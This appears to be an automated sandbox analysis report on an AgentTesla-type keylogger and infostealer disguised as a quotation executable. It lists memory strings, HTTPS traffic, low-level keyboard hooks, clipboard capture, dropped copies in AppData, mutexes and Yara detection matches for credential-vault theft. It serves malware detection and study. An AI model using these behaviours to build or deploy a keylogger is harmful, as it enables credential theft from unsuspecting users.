                    Source: rQuotation3200025006.exe, 00000000.00000002.1732045998.0000000002701000.00000004.00000800.00020000.00000000.sdmp, rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 00000009.00000002.1841537852.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.00000000034B1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000010.00000002.1901166814.0000000002521000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1961223046.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000019.00000002.1979059945.0000000002F24000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000001C.00000002.4163218058.000000000336C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735717457.0000000005030000.00000004.00000020.00020000.00000000.sdmp, rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: rQuotation3200025006.exe, 00000000.00000002.1732806803.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1958682977.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: rQuotation3200025006.exe, 00000000.00000002.1732806803.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.00000000034B1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1958682977.0000000000402000.00000040.00000400.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1961223046.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000001C.00000002.4163218058.000000000336C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.00000000034B1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1961223046.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000001C.00000002.4163218058.000000000336C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.00000000034B1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1961223046.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000001C.00000002.4163218058.000000000336C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49740 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49748 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49755 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, SKTzxzsJw.cs.Net Code: _71ZRqC1D
                    Source: 0.2.rQuotation3200025006.exe.377e4e0.2.raw.unpack, SKTzxzsJw.cs.Net Code: _71ZRqC1D
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_0692C628 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,0692D458,00000000,000000008_2_0692C628
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\rQuotation3200025006.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.rQuotation3200025006.exe.377e4e0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.rQuotation3200025006.exe.377e4e0.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 22.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 22.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.rQuotation3200025006.exe.377e4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.rQuotation3200025006.exe.377e4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    .NET source code contains very large array initializations
                    Source: rQuotation3200025006.exe, MainMenu.csLarge array initialization: : array initializer size 590396
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: rQuotation3200025006.exe
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 0_2_008AF2E40_2_008AF2E4
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 0_2_04BBB7E80_2_04BBB7E8
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 0_2_04BBE7D80_2_04BBE7D8
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 0_2_04BBB7D80_2_04BBB7D8
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 0_2_04BBE7CB0_2_04BBE7CB
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 0_2_04BBE3A00_2_04BBE3A0
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 0_2_04BBE39B0_2_04BBE39B
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 0_2_04BBEC100_2_04BBEC10
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 0_2_04BB5E280_2_04BB5E28
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 0_2_04BB5E180_2_04BB5E18
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 0_2_06CC0E700_2_06CC0E70
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 0_2_06CC0A380_2_06CC0A38
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_02A6EA088_2_02A6EA08
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_02A64A688_2_02A64A68
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_02A63E508_2_02A63E50
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_02A6ADA08_2_02A6ADA0
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_02A641988_2_02A64198
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_060B15408_2_060B1540
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_060B15508_2_060B1550
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_0692C76C8_2_0692C76C
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_069239C48_2_069239C4
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_069262D78_2_069262D7
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_069255E38_2_069255E3
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_069255E88_2_069255E8
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_069239B88_2_069239B8
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_06937E908_2_06937E90
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_069356A88_2_069356A8
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_069367008_2_06936700
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_069327588_2_06932758
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_0693B3488_2_0693B348
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_06935E088_2_06935E08
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_069377B08_2_069377B0
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_0693E4C88_2_0693E4C8
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_069300408_2_06930040
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 8_2_0693003F8_2_0693003F
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 9_2_00D2F2E49_2_00D2F2E4
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 9_2_06AC0E709_2_06AC0E70
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 9_2_06AC0A389_2_06AC0A38
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 14_2_018CE9F814_2_018CE9F8
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 14_2_018C4A6814_2_018C4A68
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 14_2_018CAD9014_2_018CAD90
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 14_2_018C3E5014_2_018C3E50
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 14_2_018C419814_2_018C4198
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 14_2_0708670014_2_07086700
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 14_2_07087E9014_2_07087E90
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 14_2_070856A814_2_070856A8
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 14_2_0708357814_2_07083578
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 14_2_0708B34314_2_0708B343
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 14_2_0708274B14_2_0708274B
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 14_2_070877B014_2_070877B0
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 14_2_07085DF714_2_07085DF7
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 14_2_0708E4C814_2_0708E4C8
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 14_2_0708004014_2_07080040
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 14_2_0708003F14_2_0708003F
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_00B0F2E416_2_00B0F2E4
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_066D0E7016_2_066D0E70
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_066D278016_2_066D2780
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_066D0A3816_2_066D0A38
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_03024A6822_2_03024A68
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_03023E5022_2_03023E50
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0302AC7022_2_0302AC70
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0302419822_2_03024198
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_0302E9C122_2_0302E9C1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_06F1358022_2_06F13580
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_06F1004022_2_06F10040
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_06F177B822_2_06F177B8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_06F1000622_2_06F10006
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_02CDF2E425_2_02CDF2E4
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_0542050825_2_05420508
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_0542051825_2_05420518
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_05421D3125_2_05421D31
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_07270E7025_2_07270E70
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_07270A3825_2_07270A38
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 28_2_032C4A6828_2_032C4A68
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 28_2_032CE8D828_2_032CE8D8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 28_2_032C3E5028_2_032C3E50
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 28_2_032C419828_2_032C4198
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 28_2_032C199028_2_032C1990
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 28_2_071AC3FC28_2_071AC3FC
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 28_2_071A52A828_2_071A52A8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 28_2_071A52A228_2_071A52A2
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 28_2_071B670828_2_071B6708
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 28_2_071B7E9828_2_071B7E98
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 28_2_071B56B028_2_071B56B0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 28_2_071B358028_2_071B3580
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 28_2_071B004028_2_071B0040
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 28_2_071B77B828_2_071B77B8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 28_2_071B5DFF28_2_071B5DFF
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 28_2_071BE4D028_2_071BE4D0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 28_2_071B001D28_2_071B001D
                    Source: rQuotation3200025006.exe, 00000000.00000002.1731067314.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rQuotation3200025006.exe
                    Source: rQuotation3200025006.exe, 00000000.00000002.1732806803.00000000036B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs rQuotation3200025006.exe
                    Source: rQuotation3200025006.exe, 00000000.00000002.1738225361.0000000006F70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs rQuotation3200025006.exe
                    Source: rQuotation3200025006.exe, 00000000.00000000.1676301194.0000000000290000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBWmX.exeD vs rQuotation3200025006.exe
                    Source: rQuotation3200025006.exe, 00000000.00000002.1739676085.0000000007710000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBWmX.exeD vs rQuotation3200025006.exe
                    Source: rQuotation3200025006.exe, 00000000.00000002.1732806803.0000000003924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs rQuotation3200025006.exe
                    Source: rQuotation3200025006.exe, 00000000.00000002.1732045998.0000000002701000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs rQuotation3200025006.exe
                    Source: rQuotation3200025006.exe, 00000008.00000002.4157176054.0000000000CF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs rQuotation3200025006.exe
                    Source: rQuotation3200025006.exeBinary or memory string: OriginalFilenameBWmX.exeD vs rQuotation3200025006.exe
                    Source: rQuotation3200025006.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.rQuotation3200025006.exe.377e4e0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.rQuotation3200025006.exe.377e4e0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 22.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 22.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.rQuotation3200025006.exe.377e4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.rQuotation3200025006.exe.377e4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: rQuotation3200025006.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: pBBqGOzrz.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, KHpWQ0SIuHGDwagjf6.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, KHpWQ0SIuHGDwagjf6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, KHpWQ0SIuHGDwagjf6.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.rQuotation3200025006.exe.6f70000.5.raw.unpack, SIQfwITd9ei2CpANlp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@39/20@2/2
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeFile created: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6512:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6744:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1748:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMutant created: \Sessions\1\BaseNamedObjects\dUNTqlHSZjNOL
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3D2.tmpJump to behavior
                    Source: rQuotation3200025006.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: rQuotation3200025006.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
